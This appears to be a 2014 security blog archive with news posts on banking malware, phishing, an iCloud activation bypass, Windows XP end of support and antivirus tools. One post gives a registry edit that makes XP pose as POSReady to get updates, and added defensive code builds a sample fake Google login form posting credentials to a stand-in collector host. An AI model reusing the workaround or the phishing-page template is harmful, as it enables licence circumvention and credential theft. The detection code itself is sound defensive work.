In 2010, Facebook overtook Orkut as the top social networking site in India with 20.9 million visitors in July that year compared to Orkut's 16 per cent growth with 19.9 million visitors, according to research firm comScore.

Google said it would preserve an archive of all Orkut communities that will be available from September 30.

"If you don't want your posts or name to be included in the community archive, you can remove Orkut permanently from your Google account," Google said.


Read from Orkut blog: http://en.blog.orkut.com/

Friday, June 27, 2014

Banking malware 'Luuuk' might have stolen $682K in one week

A European bank may have lost as much as $682,000 in a week earlier this year, according to Kaspersky Lab, which analyzed data on a server used in attacks against online banking users in Italy and Turkey.

In a blog post on Wednesday, the Russian security company didn't identify the bank or say why it chose to reveal the possible theft six months later. The financial institution has been notified of the discovery, and Kaspersky said it is in contact with law enforcement.

On Jan. 20, Kaspersky analysts discovered a command-and-control server for a piece of malware that executed so-called man-in-the-browser attacks on victims' computers. In that type of attack, malware intervenes during an online banking session and can manipulate or steal data.

Two days later, the fraudsters removed all of the "sensitive components" from the server, Kaspersky wrote. That indicates the cyber criminals may have known someone else was looking at it.

The fraud campaign was nicknamed "Luuuk" by Kaspersky after that name appeared in a file path of the server's administrator control panel. It appears the server managed the theft of funds from victims' accounts, automatically transferring the money to the accounts of "mules," or people who agree to receive the funds for a cut and transfer the bulk of the funds onward.

Server logs indicated that as much as $682,000 may have been transferred in a single week, wrote Kaspersky's Global Research and Analysis Team. The data indicated around 190 victims. Analysts also saw on the server descriptions of fraudulent transfers and the IBANs (international bank account numbers) of victims and money mules.

Kaspersky hasn't seen a sample of the actual malware that was on victims' computers. But data on the server indicated it is similar in functionality to the infamous Zeus banking malware.

The Luuuk malware collected the logins and passwords of victims and one-time passcodes. Since one-time passcodes typically expire in a few minutes, this type of banking malware will use the code to quickly log into the victim's account.

The attackers checked the victim's balance and then conducted several fraudulent transactions automatically, likely "in the background of a legitimate banking session," the company wrote.

There are other indicators that the group is still very active, Kaspersky wrote, although it did not give further details.


Friday, June 13, 2014

Chinese smart phone Xiaomi can steal bank card data using NFC

The Nanjing-based Chinese newspaper Yangtse Evening News states that smartphones produced by the Chinese manufacturer Xiaomi are able to steal bank card data over a wireless connection. A woman from Nanjing reportedly told the newspaper that her new Xiaomi smartphone managed to pick up private account details from a bank card kept very close to it.

The woman was surprised to see the data displayed directly on the screen of her device: the information sent to the smartphone included the number of the card held nearby and the account’s last 10 transactions, with their amounts and locations.

“Feng, who said she had not accessed her bank account on her phone or entered her password, initially thought it may have been the work of spyware, though she soon realized it was an automatic function because her bank card could still be read even after she closed all running applications,” states the WantChinaTimes.

“Near field communication (NFC) is a set of standards for smartphones and similar devices to establish radio communication with each other by touching them together or bringing them into close proximity. The standard describes a radio technology that allows two devices to communicate at a short distance, no more than a few centimeters, allowing the exchange of information quickly and safely,” as I reported in a previous post on NFC standards.

The disconcerting discovery made by the experts in charge of the Yangtse Evening News is that Feng’s phone could retrieve details from a microchip bank card automatically within two seconds from a range of about 10 centimeters.

This means that an attacker who passes very close to your wallet in a crowded place could steal personal information from your bank cards without your knowledge.

Feng said she was shocked by the behavior of the Xiaomi smartphone and believed the company should have warned its customers about this potentially serious security flaw, which could expose them to the theft of personal information from bank cards.

“She said when she called customer support she was told that she could simply switch off the NFC function if she had concerns.”

This is really worrying; let’s hope Xiaomi and other manufacturers will take NFC security issues seriously.


Wednesday, June 11, 2014

Hackers are not satisfied with payment data

Last year, Trustwave company saw a 33% increase in the data theft of sensitive and confidential information, such as financial credentials, internal communications, personally identifiable information and various customer records. In all, 45% of thefts involved non-payment data, according to the “2014 Trustwave Global Security Report.”

Payment card data remains the main target for data compromises, but increasingly thieves are starting to go after other types of personal and sensitive data, according to a new report from security firm Trustwave.

Trustwave based the findings in the 123-page report on an analysis of 691 data-breach investigations conducted last year (a 54% increase from 2012), along with threat intelligence from its global security operations, telemetry from security technologies and research.

Without a strong defense mechanism set up almost universally, data thieves will continue to thrive, Trustwave contends.

“A global, thriving underground provides for quick monetization of stolen data no matter where the victim or attacker resides,” the company said in the report. “As long as criminals can make money by stealing data and selling that sensitive information on the black market, we don’t expect data compromises to subside.”

Weak passwords contributed to 31 percent of compromises Trustwave investigated. More than half, 59%, of compromised victims resided in the U.S., 14 percent in the United Kingdom and 11 percent in Australia.

In 2013, eCommerce accounted for 54% of assets targeted by hackers, and point-of-sale breaches accounted for 33 percent of Trustwave’s investigations.

Retail was the top industry compromised, accounting for 35 percent of the attacks investigated. Food and beverage ranked second at 18 percent, hospitality ranked third at 11 percent, and finance ranked fourth at 9 percent.

The median number of days from initial intrusion to detection was 87. Some 71% of all compromised victims did not know they were compromised, though self-detection can shorten to one day from 14 days the timeline from detection to containment when detected by a third party, Trustwave noted in its report. The median number of days from detection to containment was seven.

“Victims that identify a breach on their own detect it sooner and reduce clean-up time by two weeks,” Trustwave said. “A plan will help make your organization aware of a compromise sooner, limit its repercussions and shorten its duration.”

Among the exploits detected, 85% involved third-party plug-ins, including Java applets, Adobe Flash and Adobe Acrobat/Reader. “78% of exploits we detected took advantage of Java vulnerabilities,” Trustwave said in its report.

At 49%, Blackhole topped the list of most prevalent exploit kits. “However, the arrest of its creator and a lack of updates to the kit spurred a 15% decline in Blackhole’s prevalence,” Trustwave said. “We expect the second-most prevalent kit, Magnitude at 31%, to fill the gap.”

Moreover, 96% of applications, and 100% of mobile applications, Trustwave scanned harbored one or more serious security vulnerabilities. Based on attack-source IP addresses, the top three hosting countries for malware last year were the U.S., at 42%; Russia, at 13%; and Germany, at 9%.

“This may be a result of foreign attackers adapting to businesses blocking connections from foreign IP addresses by compromising other assets within the target country and using them as “jump servers” to launch attacks against primary targets,” Trustwave said.

In the report, Trustwave suggested a few ways to counter breach attacks, including educating staff and employees on the best security practices, enforcing strong authentication policies and practices, assessing data protections across all assets, testing system resilience to attacks, and developing and rehearsing incident response plans.

“Secure all of your data, and don’t lull yourself into a false sense of security just because you think your payment card data is protected,” Trustwave advised. “Assess your entire set of assets from endpoint to network to application to database. Any vulnerability in any asset could lead to the exposure of data.”

Many of the multi-site breaches centered on franchise business models. As such, the information technology used must be strong, Trustwave advised. “Franchisees are often required to deploy information technology defined by the franchisor for efficiency purposes and to simplify management of those environments,” the company noted. “While a well-designed technology template can help to improve security, a poor design can result in a vulnerability present across potentially thousands of locations. If an attacker discovers and takes advantage of a flaw at one franchise, they can replicate the exploit at other locations.”



Monday, June 9, 2014

Windows XP can get updates till today!

Microsoft officially ended support for Windows XP on April 8, 2014. This move led a large number of users to switch to the latest version of Windows, but a wide range of users are still running XP, Microsoft's oldest and most widely used operating system, despite no longer receiving security updates from Microsoft.

But some companies and organizations that were not able to migrate their systems running Windows XP to another operating system before support ended are still receiving updates by paying Microsoft for security patches. Now a relatively simple trick has emerged that makes it possible for XP users to receive Windows XP security updates for the next five years, i.e. until April 2019.

It makes use of updates for Windows Embedded POSReady 2009, which is based on Windows XP Service Pack 3: the security updates released for POSReady 2009 are the same updates Microsoft would have rolled out for Windows XP if it were still supporting it.

Windows Embedded POSReady 2009 is the operating system installed in point-of-sale (POS) systems such as restaurant machines, ticket machines and other customized Windows Embedded systems. Because a POS machine most likely runs the XP code base, it receives the same updates that Microsoft delivers for the officially unsupported version of Windows XP.

You are not allowed to install these updates directly on your OS. In order to download new security updates for your Windows XP, you just need to make a small change to the Windows registry.

FOLLOW THESE STEPS:
1. Open Notepad and create a new file.
2. Add the following lines to it:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001
3. Save the file with a .reg extension (e.g. test.reg) and run it by double-clicking it.
4. Once executed, you will find lots of pending updates in your Windows Action Center.
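For administrators who need to know which machines in an inventory are relying on this marker, here is an added audit script (not from the original post) that distinguishes a genuine Windows Embedded POSReady 2009 device from a desktop XP machine carrying the PosReady key, and from an XP machine receiving no updates at all. It runs locally under PowerShell 2.0 or later; the function name, the status labels and the assumption that the POSReady caption contains "POSReady" are this example's own.

```powershell
# Added audit example, not code from the original post.
# Reports whether this host gets security updates as a real POSReady 2009
# device, as a desktop XP box using the registry marker described above,
# or not at all. Assumes PowerShell 2.0+ running on the host being checked.
function Get-XpPatchSourceStatus {
    $keyPath   = 'HKLM:\SYSTEM\WPA\PosReady'
    $markerSet = $false

    # The marker the trick relies on: HKLM\SYSTEM\WPA\PosReady\Installed = 1
    if (Test-Path -Path $keyPath) {
        $prop = Get-ItemProperty -Path $keyPath -Name 'Installed' -ErrorAction SilentlyContinue
        if ($prop -and [int]$prop.Installed -eq 1) { $markerSet = $true }
    }

    # Desktop XP and POSReady 2009 both report version 5.1.2600, so the
    # caption is what tells them apart (assumed to contain "POSReady").
    $os         = Get-WmiObject -Class Win32_OperatingSystem
    $isXpFamily = $os.Version -like '5.1.*'

    if (-not $isXpFamily) {
        $status = 'NotXpFamily'
    } elseif ($os.Caption -match 'POSReady') {
        $status = 'GenuinePosReady2009'
    } elseif ($markerSet) {
        # Receives POSReady patches, but is still an unsupported XP install
        $status = 'XpUsingPosReadyMarker'
    } else {
        $status = 'XpNoSecurityUpdates'
    }

    New-Object -TypeName PSObject -Property @{
        ComputerName = $env:COMPUTERNAME
        Caption      = $os.Caption
        Version      = $os.Version
        MarkerSet    = $markerSet
        Status       = $status
    }
}

# Usage: run on each machine in the inventory and review the Status field.
Get-XpPatchSourceStatus | Format-List
```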

Because extended support for Windows Embedded POSReady 2009 ends after five years, Microsoft will continue to deliver new security updates and patches for this version of its embedded operating system until April 9th, 2019, so users can use this trick to get Windows XP security updates for another five years.

Even with security updates obtained through such tricks, it is not possible to secure the complete system appropriately. So all of you should upgrade your operating system to a current version, i.e. Windows 7 or 8, or any Linux OS.


Thursday, May 29, 2014

Secure your passwords with Password Manager

Using a different password for every online site and service is critical to your cyber security.

There's a war raging between hackers and companies, and you're caught in the crossfire. Every time a company gets hacked, you have to change your password. And don't you dare reuse it somewhere else.

Dreaming up a different password for every site and service is the only way to keep your stuff safe online, but it's also a gigantic nuisance. There's one thing you can and should do to help: Get a password manager program. Password managers hide your information behind a master password that only you know.

A password manager lets you manage all your passwords together; here are four password manager programs: 1Password, Dashlane, LastPass and PasswordBox.

LastPass is a good choice for people who use newer technology like fingerprint scanners. For the really paranoid, 1Password offers the most control over where your encrypted vault of passwords gets stored.

For most people, I recommend Dashlane. It's simple, so you'll actually use it. It may even save you clicks.

Nothing is 100% guaranteed, but all four of these managers take the additional security step of never sending your master password over the Internet. They're like a safe-deposit box that a professional keeps without knowing what's inside, or even holding a key to open it.

In an age where more of our personal information lives, password protected, up in the cloud, we need defenses beyond antivirus software. Using a password manager is the next step.

Now keep all your passwords in a password manager and relax.


Monday, May 26, 2014

Blackshades malware spies through your webcam

In the old days, one simply had to draw the blinds to stop peeping toms from spying on one's private business. Now, it seems that even with the shades drawn, one must also shutter the webcam. Earlier this week, the FBI initiated a crackdown leading to the arrest of nearly 100 users of a program called Blackshades malware. This program allows hackers to remotely access the computers of their victims, enabling them to steal files, log passwords, and even turn on microphones and webcams unnoticed. This spying software could be purchased online for as little as US$40.

Blackshades malware is referred to as a remote access tool (RAT), meaning it allows the hacker to gain full access to your machine as if he were sitting right in front of it. The technology behind this threat is similar to that used by the IT department at your office. When Joe IT Guy needs to access your work computer to install updates, fix an issue with your settings, or remotely control your machine for a variety of other reasons, he can with advanced warning and mutual understanding that he has the right to do so. Perpetrators of Blackshades malware aren’t quite as courteous.

Prior to the FBI crackdown this week, anyone with an Internet connection could purchase the Blackshades software, and they didn’t need to be a skilled hacker to use it, either. As security blogger Brian Krebs put it, “Blackshades was a tool created and marketed principally for buyers who wouldn’t know how to hack their way out of a paper bag.” The ease of use (and ease of purchase) associated with Blackshades malware illustrates the “hacking as a service” phenomenon, where anyone with the financial means necessary can become a cybercriminal. The software even came with tools known as “spreaders” which helped these novice cybercriminals distribute malicious links via social media, in an effort to infect more computers. As with most other malware attacks, Blackshades relies on you visiting an infected website or downloading an infected file in order to install a hacker’s malicious software on your computer.

The prepackaged malware also came with tools to help cybercriminals extract money from their victims, otherwise known as ransomware. Ransomware works by allowing the hacker to lock or encrypt files (sometimes even locking you out of your device completely), and then demand money in exchange for allowing you to regain access.

Blackshades malware is a multidimensional, robust software program with a relatively puny price tag. And just because the FBI has cracked down on its users, doesn’t mean it’s disappeared from the Web completely. In fact, this strain of malware has been around for years.

Here are some steps you can take to protect yourself from virtual peeping toms:
  • Do not click on links from unknown senders
  • Use web protection when surfing online
  • Avoid attachments from unknown senders
  • Download apps, music, and movies from official sources
  • Install comprehensive security on your system

Microsoft ends support for Windows XP and Office 2003

Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. After this date, these products will no longer receive:
  1. Security patches which help protect PCs from harmful viruses, spyware, and other malicious software
  2. Assisted technical support from Microsoft
  3. Software and content updates

All software products have a lifecycle. End of support refers to the date when Microsoft no longer provides automatic fixes, updates, or online technical assistance. As of February 2014, nearly 30 percent of Internet-connected PCs still run Windows XP.

Microsoft will send “End of Support” notifications to users of Windows XP who have elected to receive updates via Windows Update. Users in organizations using Windows Server Update Services (WSUS), System Center Configuration Manager, or Windows Intune will not receive the notification.

The Impact
Computer systems running unsupported software are exposed to an elevated risk to cybersecurity dangers, such as malicious attacks or electronic data loss.

Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows XP or Office 2003.

Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements.


What is the Solution?
Computers operating Windows XP with SP3 or running Office 2003 products will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats.

Users have the option to upgrade to a currently supported operating system or office productivity suite. The Microsoft “End of Support” pages for Windows XP and Office 2003 offer additional details.

There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows XP or Office 2003 to a currently supported operating system or office productivity suite.

Users who choose to continue using Windows XP after the end of support may mitigate some risks by using a web browser other than Internet Explorer. The Windows XP versions of some alternative browsers will continue to receive support temporarily. Users should consult the support pages of their chosen alternative browser for more details.

So Windows XP users should migrate to Windows 7; otherwise, be especially careful about viruses and other cyber threats.

Saturday, May 24, 2014

Apple iCloud stormed by Dutch Hackers

Apple's cloud service, iCloud, is probably one of the more secure cloud services around. It is the cloud storage and cloud computing service that Apple Inc. has provided to its users since October 2011, with more than 320 million users across the world.

A pair of hackers, one going by the name AquaXetine and a Moroccan hacker going by the name Merruktechnolog, have claimed to have hacked the Apple iCloud system. The hackers used a man-in-the-middle attack to unlock Apple locked devices.

According to a report from Dutch news organization De Telegraaf, the hackers purchased locked iPhone devices for $50 to $150 each and then bypassed Apple’s iCloud activation lock through a serious security vulnerability Apple has failed to patch with its most recent updates. iCloud service allows users to store and back-up data such as music, photos, applications, documents, bookmarks, reminders, backups, notes, iBooks, and contacts, and provides a platform for Apple's email servers and calendars. 

Security experts say that hackers can do more with the vulnerability: an attacker can read messages and also steal Apple ID credentials from the devices. The hackers worked for five months to breach the security of the Apple iCloud system. Yesterday the Doulci hacker group posted on Twitter that they had “processed” more than 5,700 Apple devices in just five minutes using the hack. With good intentions and in an ethical spirit, the hackers reported the vulnerability to the Apple security team back in March, but Apple never responded to their report.

This led the hackers to disclose the vulnerability publicly. The pair are offering unlocking services via the doulCi.nl website, according to information found on the site. With this, doulCi claims to be the world’s first alternative iCloud server and the world’s first iCloud activation bypass.


Wednesday, May 21, 2014

Tips from cyber experts to tread safely

They know the risks of the internet better than anyone, but most cyber experts still shop and bank online with care.

"We operate in the 21st century ... I've got to shop online, I've got to pay my bills online," Brigadier General Paul Nakasone, deputy commander of US Army Cyber Command, said at the Reuters Cybersecurity Summit.

"You can't really function without it," agreed Nart Villeneuve, researcher at the cybersecurity firm FireEye.

Some actions can leave you wide open for data abuse, like checking into a hotel and handing over a credit card, he said. "I guess you could pull up with a money clip but I don't know that you can even do that," he said.

The tricks that the smartest cybersecurity minds use for online safety hygiene are basic: Avoid websites that are visibly questionable, don't thoughtlessly click on links or attachments, monitor your account activity regularly and only give away the minimum amount of information.

On passwords, the bulwark of online security, experts also stuck to simple rules: Make them complex and change regularly. Some also said they use more secure login processes when available.

"I tend to be a bit of a two-factor authentication freak," said Eddie Schwartz, cyber chief at Verizon, saying he always takes advantage of any extra security steps offered, like confirming his login with a code sent to his cellphone.

Another key to safe online shopping and banking is using internet connections that are as secure as possible.

"I never do it on the road. I never do it from my mobile device," said Michael Hayden, former director of the CIA and the National Security Agency.

While most experts avoid using public wireless internet connections, some go further.

"I have a separate computer and router for financial transactions," said Dan Kaufman, director of information innovation at the Defense Advanced Research Projects Agency (DARPA), the arm of the US Defense Department credited with inventing the internet.

Kaufman said he searches for potential online purchases on one computer, then moves to a second computer to make the transaction.

Digital Bond CEO Dale Peterson had a similar strategy: a separate computer, "with its own 20-plus character password," for online banking and payroll purposes.

In a breach revealed in December by US retailer Target Corp, some 40 million credit or debit card records and 70 million other customer records, such as addresses and telephone numbers, were stolen. The perpetrators remain at large.

Several cyber experts said they felt less concerned about the potential to lose credit card data, because of limited liability, but draw the line at online banking and modern conveniences like depositing checks by smartphone.

"I'm paranoid about online banking," said Stuart McClure, CEO of security firm Cylance. "I'm a little bit more comfortable now but I hate to do online banking. I hate it.

"I used to change my passwords so much that I'd forget them over time. And I never ever put my PIN into anything electronic, only physical devices. And even then, I'm pulling up, looking for skimmers," he said, referring to devices made to secretly swipe card information from ATM machines.

Is total avoidance a solution?

"I am not one who says that the answer is to withdraw from the digital world that we live in. I just don't think that's particularly realistic," said Admiral Mike Rogers, the new director of the NSA. "Let's deal with the world the way it is."

Saturday, May 17, 2014

A New Phishing method to steal Google account details

Security experts at Bitdefender have discovered an ingenious new phishing scheme that hackers are using to steal Google Account credentials.

The new phishing attack is hard to catch with traditional heuristic detection, and it mainly affects users of the Google Chrome and Mozilla Firefox browsers.

The hackers send an email that pretends to be from Google; it warns the victim that his account will be locked within the next 24 hours because the associated inbox has reached its maximum capacity.

"With access to users' Google accounts, hackers can buy apps on Google Play, hijack Google+ accounts and access confidential Google Drive documents," reports Catalin Cosoi, chief security strategist at Bitdefender, in the official blog post. "The scam starts with an email allegedly sent by Google, with 'Mail Notice' or 'New Lockout Notice' as a subject."

To avoid having the Google account "locked in 24 hours", the user is invited to follow the "INSTANT INCREASE" link, which redirects victims to a bogus Google login page. Using this artifice, hackers can steal Google account credentials within the browser.

Cosoi explained that it is very difficult for users to notice the attack because the fake Google login page is served through a "data:" uniform resource identifier (URI), so nothing in the address bar identifies it as a phishing page. The attackers exploit the way Google Chrome displays "data:" URIs.

Users see "data:" in the address bar of their browser, which indicates the use of the data URI scheme; this scheme allows a page's content to be included in-line, inside the URI itself, as if it were an external resource.

“The scheme uses Base64 encoding to represent file contents, in this case supplying the content of the fake web page in an encoded string within the data URI. As Google Chrome doesn’t show the whole string, regular users have a hard time figuring out they are targeted in a phishing attack and may give their data to cyber-criminals.” states the post.

Bitdefender says the scammers avoid detection by using the data URI scheme, which embeds content in-line as if it came from an external source: the whole fake web page is Base64-encoded into the string that follows "data:", so no hostname ever appears in the address bar.
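As an added defender-side illustration of the technique described above (example code written for this page, not Bitdefender's), the following Python helper decodes a "data:" URI the way a mail or proxy filter might, and reports why the decoded content looks like an in-line credential-harvesting page. The fake login page and the collector host "collector.example.invalid" are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: a "data:" URI carrying a Base64-encoded fake login form
# (a stand-in for the kind of page the article describes, not the real one).
FAKE_PAGE = b"""<html><body><h1>Sign in to your account</h1>
<form method="post" action="http://collector.example.invalid/submit">
<input name="Email"><input type="password" name="Passwd">
<input type="submit" value="INSTANT INCREASE"></form></body></html>"""
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(FAKE_PAGE).decode()


def parse_data_uri(uri):
    """Split a data: URI into (media type, is_base64, decoded payload bytes)."""
    if not uri.lower().startswith("data:"):
        raise ValueError("not a data: URI")
    header, sep, payload = uri[5:].partition(",")
    if not sep:
        raise ValueError("malformed data: URI (no comma separating header and payload)")
    params = header.split(";")
    media_type = params[0] or "text/plain"          # RFC 2397 default
    is_b64 = "base64" in [p.lower() for p in params[1:]]
    if is_b64:
        data = base64.b64decode(payload, validate=False)
    else:
        data = unquote(payload).encode()            # percent-encoded form
    return media_type, is_b64, data


def assess_data_uri(uri):
    """Return the reasons this data: URI looks like an in-line phishing page.

    An empty list means nothing suspicious was found (e.g. a plain-text URI).
    """
    media_type, is_b64, body = parse_data_uri(uri)
    text = body.decode("utf-8", errors="replace")
    reasons = []
    if media_type.startswith("text/html"):
        reasons.append("renders a full HTML document straight from the address bar")
    if is_b64:
        reasons.append("page content is Base64-encoded, so the address bar shows no readable URL")
    if re.search(r'<input[^>]+type=["\']?password', text, re.I):
        reasons.append("decoded page contains a password field")
    for action in re.findall(r'<form[^>]+action=["\']?([^"\'\s>]+)', text, re.I):
        if action.lower().startswith(("http://", "https://")):
            reasons.append(f"form posts its fields to an external host: {action}")
    return reasons


if __name__ == "__main__":
    for reason in assess_data_uri(SAMPLE_DATA_URI):
        print("-", reason)
```

A real filter would apply the same check to every "data:" link found in a message body, since the address bar never shows the user anything more than the scheme.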

According to Bitdefender, more than a thousand users were deceived by the phishing scheme.

“So far, more than a thousand users clicked on a single shortened URL used in the cyber-campaign. The numbers are without doubt a lot higher, as scammers create more than a single URL when crafting a phishing wave,” added Cosoi.

Phishing is becoming one of the most popular fraudulent activities in the cyber criminal ecosystem, and according to reports from the principal security firms, hackers are exploiting new platforms such as mobile and social media.

Cyber criminals are trying to make phishing attacks harder to detect by refining their email targeting, and attackers keep finding new methods of bypassing the checks implemented by email providers and security firms.

A targeted attack usually exploits the "human factor": phishing campaigns rely on social engineering techniques, which is why it is important to inform users of the tactics adopted by cyber criminals.

Organisations must train their personnel to reduce their human attack surface and avoid becoming victims of such attacks.
So, be careful while using your Google account.


Thursday, May 15, 2014

JAR file malware a threat on Facebook

Cyber criminals are back with another way to reach their victims via the popular social network Facebook. Recently many Facebook users have received a message, from a trusted friend or from an unknown person, that contains only the text "LOL" and a ZIP file.

If you have received the same message in your inbox, and it came from a trusted friend, you might download the file without any hesitation. In fact this ZIP file contains a malicious JAR file: the Trojan horse currently circulating via Facebook Messenger.

This malware campaign was spotted by Malwarebytes in early March. They explain that the Trojan spreads itself through Facebook's Messenger service (inbox) by messaging a victim while pretending to be one of their friends, saying "LOL" with a zip file attached that appears to be a photo, named "IMG_XXX.zip".

How It Works?
The user gets a Facebook instant message from a friend, which includes the word "LOL" and a file waiting to be downloaded.
The user downloads the file because they assume it can be trusted. The filename matches the usual filename of a photo: IMG_xxxx.zip.
Once downloaded, the user unzips the file and clicks on what they assume is an image file, which is actually IMG_xxxx.jar.
The JAR file executes, downloads malware and infects the system.
The infected user's Facebook account is compromised and then used to send more malware to the user's Facebook friends.
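As an added defender-side illustration of the steps above (example code written for this page, not Malwarebytes' analysis), this Python helper inspects a ZIP attachment before anything in it is opened, flagging entries that carry an executable extension, that are really Java archives regardless of name, or that use a photo-style filename without an image extension. The "IMG_0427.zip" stand-in it builds in memory is constructed for the example.

```python
import io
import zipfile

EXECUTABLE_EXTENSIONS = {".jar", ".exe", ".scr", ".bat", ".cmd", ".js", ".vbs"}
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
PHOTO_STYLE_PREFIXES = ("IMG_", "DSC_", "PHOTO")


def build_sample_message_zip():
    """Construct a stand-in for the 'IMG_xxxx.zip' bait: a ZIP holding a minimal
    JAR (a JAR is itself a ZIP with a manifest). Constructed for this example."""
    jar_buf = io.BytesIO()
    with zipfile.ZipFile(jar_buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Loader\n")
        jar.writestr("Loader.class", b"\xca\xfe\xba\xbe" + b"\x00" * 12)  # class-file magic only
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("IMG_0427.jar", jar_buf.getvalue())
    return outer.getvalue()


def looks_like_jar(data):
    """True if the bytes are a ZIP archive containing META-INF/MANIFEST.MF (a JAR)."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as inner:
            return "META-INF/MANIFEST.MF" in inner.namelist()
    except zipfile.BadZipFile:
        return False


def inspect_zip_attachment(zip_bytes):
    """Return (entry name, reason) pairs for every entry that must not be opened blindly.

    Checks the name, the extension and the actual content of each entry, because
    the bait relies on the user trusting the photo-style name alone.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            name = info.filename
            base = name.rsplit("/", 1)[-1]
            ext = "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""
            data = z.read(info)
            if ext in EXECUTABLE_EXTENSIONS:
                findings.append((name, f"executable extension {ext}"))
            if looks_like_jar(data):
                findings.append((name, "content is a Java archive (has META-INF/MANIFEST.MF)"))
            if base.upper().startswith(PHOTO_STYLE_PREFIXES) and ext not in IMAGE_EXTENSIONS:
                findings.append((name, "photo-style filename without an image extension"))
    return findings


if __name__ == "__main__":
    for entry, reason in inspect_zip_attachment(build_sample_message_zip()):
        print(f"{entry}: {reason}")
```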

How To Protect yourself?

In the Malwarebytes write-up, where they analyzed the malicious file, they found that it is a Trojan, and an online virus scan gave it a detection ratio of 27/50. If you receive it from one of your trusted friends, ask them about the message and the attached file. If they deny sending it, simply DO NOT DOWNLOAD it.

If you have downloaded the file, you may already be infected with the Trojan. So if you think you are affected, scan your computer with a trusted and reputable antivirus program.

We recommend that our users always keep their antivirus program up to date and use trusted programs. Don't download any file from the net without knowing what it is, and always download from trusted sites only.

Monday, May 12, 2014

Best free antivirus software 2014

Anyone who has been following the news about the Heartbleed bug, a vulnerability in OpenSSL that enables hackers to gain access to the memory of web servers, understands just how dangerous the web can be. In addition to security flaws like Heartbleed, viruses, spyware and phishing sites make it possible for hackers to expose crucial data. To ensure better protection, every PC owner needs effective, reliable antivirus software. Unfortunately, this can be expensive, especially given the cost of annual updates.
However, there are plenty of free antivirus software solutions on the market. We've picked out nine of the best free internet security tools to deliver great security at no cost.

1. Avast Free Antivirus
The program is simple to install; a straightforward interface makes it easy to use; a quick first scan should identify any potential threats on your PC, and this all has minimal impact on your system performance.
These aren't just subjective opinions, either. Independent testing by AV-Test has found the program to be a good all-rounder, and it was one of AV-Comparative's "Products of 2012."
Avast Free has some useful extras, too. A Software Updater alerts you to program updates you've missed, for instance, while its Browser Cleanup tool provides a simple way to remove unwanted add-ons from your browsers.
Avast recently added a "Grime Fighter," which the company says supports 12 additional languages and offers an advanced console for more user control.

2. Panda Cloud Antivirus Free
Small and simple, Panda Cloud Antivirus is a lightweight tool which provides free real-time antivirus protection, and can be used alongside many other security tools without problems.
It's the free version of a commercial product, and so has a few missing features. The Pro edition helps to protect you at public wifi networks, for instance, while its "USB Vaccine" function reduces the risk of malware infecting a USB drive.
The core antivirus protection remains the same, though. And while that doesn't deliver the top detection rates, independent testing shows it's very capable, with the program winning certification in AV-Test's latest report.

3. ZoneAlarm Free Antivirus + Firewall
We have one or two concerns about ZoneAlarm Free Antivirus + Firewall, notably that its antivirus database is only updated daily (hourly updates are reserved for the commercial version), which leaves you more exposed to the very latest threats.
The program does provide plenty of functionality, though, with a capable, AV-Test-certified antivirus engine, an easy-to-use firewall and some browsing protection.
It does its best to keep things simple. Open the Preferences dialog, say, and you'll find only 10 buttons and settings (and most of those you'll never need to use).
The database update means it wouldn't be our first choice, but if you're a fan of ZoneAlarm, or just want a firewall and antivirus tool from the same company, this could be a good choice.

4. Avira Free Antivirus
Avira Free Antivirus provides two main areas of protection.
A strong antivirus engine (rated highly by independent labs for its file detection rates) constantly monitors your PC, looking for and eliminating threats.
If you choose to install the Avira toolbar then you also get some web tools (an antiphishing tool, ad blocker, social networking protection), although this also replaces your default search engine with an Avira page.
Problems? The interface can seem a little complex, just at first. And the program has more impact on your PC's performance than some other tools. Still, on balance Avira Free Antivirus remains a capable and effective security package.
Avira recently made available the Avira Protection Cloud (APC), which will be used to detect and thwart zero-day attacks, according to the company. The technology will be available to all users of the free software by the end of May.

5. Bitdefender Antivirus Free Edition
Bitdefender's antivirus engine is one of the best around, and a favourite of the independent testing labs, so getting a free version sounds very appealing indeed.
The program is ultra-compact, downloading and installing in less than a minute on our test PC (although it does demand removal of any incompatible products first). A very basic interface then provides effective on-demand and automatic scanning, real-time antivirus and antiphishing protection.
There are very few manual controls here: no settings, no options, no scan types, no scheduling, nothing at all, perhaps an issue if you like to fine tune your security. But if you prefer simplicity then Bitdefender Antivirus Free Edition is an excellent choice.

6. AVG Free Antivirus
AVG Free Antivirus is a solid package with a good range of features: an antivirus engine, email scanner, identity theft protection, and LinkScanner Surf-Shield to keep you safe online.
At first glance this makes the program seem more complex, as there are lots of tiles, buttons and menu entries. Smart interface design means you can carry out most common actions in a click or two, though, so you'll soon feel at home.
AVG Free Antivirus gets mixed reviews on its effectiveness: AV-Comparatives rate it as average, AV-Test say it's better than some commercial suites. Our view: it's a capable, feature-packed tool, and one of the stronger free antivirus packages.
To boost its offering, AVG recently released the AVG Zen tool, which the company claims is designed to help provide added protection across desktops and mobile devices.
Why isn't Microsoft Security Essentials in the list? It's small, simple, and won't slow your system down - but it's also just not reliable enough to justify inclusion in our best free antivirus software round-up.
When Security Essentials was last included in an AV Comparatives File Detection test, the program managed a file detection rate of 94.9%, placing it 13th out of 15. AV-Test's opinion was even lower. In its analysis of 2012 products for Home Users, Microsoft Security Essentials delivered the lowest "average protection score" of all, putting it bottom in a list of 20.

7. Emsisoft Emergency Kit
No antivirus program comes with a guaranteed 100% detection rate, and malware might occasionally slip through your defences. You should always have a second tool available, then, just in case - and Emsisoft Emergency Kit (EEK) is a great choice.
The program runs without requiring installation, reducing the chance of any conflicts with your existing antivirus package.
